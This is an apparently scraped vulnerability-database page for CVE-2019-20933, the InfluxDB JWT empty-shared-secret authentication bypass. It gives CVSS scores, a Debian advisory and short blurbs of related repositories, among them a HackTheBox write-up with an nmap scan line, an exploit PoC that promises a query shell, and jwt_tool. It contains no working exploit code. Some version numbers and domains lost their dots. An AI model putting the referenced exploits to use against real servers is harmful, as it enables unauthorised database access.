Published: 19/11/2020 Updated: 19/10/2022

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

InfluxDB prior to 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).

Vulnerable Product	Search on Vulmon	Subscribe to Product
influxdata influxdb
debian debian linux 9.0
debian debian linux 10.0

Debian Bug report logs - #978087 influxdb: CVE-2019-20933 Package: src:influxdb; Maintainer for src:influxdb is Debian Go Packaging Team <team+pkg-go@trackerdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Fri, 25 Dec 2020 20:30:01 UTC Severity: grave Tags: security, upstream Found in versio ...

It was discovered that incorrect validation of JWT tokens in InfluxDB, a time series, metrics, and analytics database, could result in authentication bypass For the stable distribution (buster), this problem has been fixed in version 164-1+deb10u1 We recommend that you upgrade your influxdb packages For the detailed security status of influxdb ...

HackTheBox - Devzat - Writeup Enumeration ⛩\> nmap -p- -sV -sC -v -oA enum --min-rate 4500 --max-rtt-timeout 1500ms --open 101292400 Nmap scan report for 101292400 Host is up (016s latency) Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 82p1 Ubuntu 4ubuntu02 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 3072 c2:

CVE-2019-20933 InfluxDB before 176 has an authentication bypass vulnerability in the authenticate function in services/httpd/handlergo because a JWT token may have an empty SharedSecret (aka shared secret) authentication complexity vector NONE LOW NETWORK confidentiality integrity availability PARTIAL PARTIAL PARTIAL CVSS Score: 75 References

CVE-2019-20933 InfluxDB before 176 has an authentication bypass vulnerability in the authenticate function in services/httpd/handlergo because a JWT token may have an empty SharedSecret (aka shared secret) (see nvdnistgov/vuln/detail/CVE-2019-20933 For more details) PoC This PoC exploits the above CVE to make a quick and dirty influxDB client Usage: usage: infl

InfluxDB Exploit CVE-2019-20933 Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 176 has an authentication bypass vulnerability in the authenticate function in services/httpd/handlergo because a JWT token may have an empty SharedSecret (aka shared secret) Exploit check if server is vulnerable, then it tries to get a remote query shell It has built in a us

The JSON Web Token Toolkit v2 jwt_toolpy is a toolkit for validating, forging, scanning and tampering JWTs (JSON Web Tokens) Its functionality includes: Checking the validity of a token Testing for known exploits: (CVE-2015-2951) The alg=none signature-bypass vulnerability (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability (CVE-2018-0114) Key injection vul

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification Resources Basics Tool URL Swaks githubcom/jetmore/swaks CyberChef gchqgithubio/CyberChef/ Information Gathering Tool URL Amass githubcom/OWASP/Amass AutoRecon githubcom/Tib3rius/AutoRecon Sparta gi

CWE-287 https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 https://github.com/influxdata/influxdb/issues/12927 https://lists.debian.org/debian-lts-announce/2020/12/msg00030.html https://www.debian.org/security/2021/dsa-4823 https://github.com/0xaniketB/HackTheBox-Devzat https://nvd.nist.gov https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=978087 https://www.debian.org/security/2021/dsa-4823

CVE-2019-20933

Vulnerability Summary

Most Upvoted Vulmon Research Post

Vulnerability Trend

Vendor Advisories

Github Repositories

References

Vulmon Search

About

Products

Connect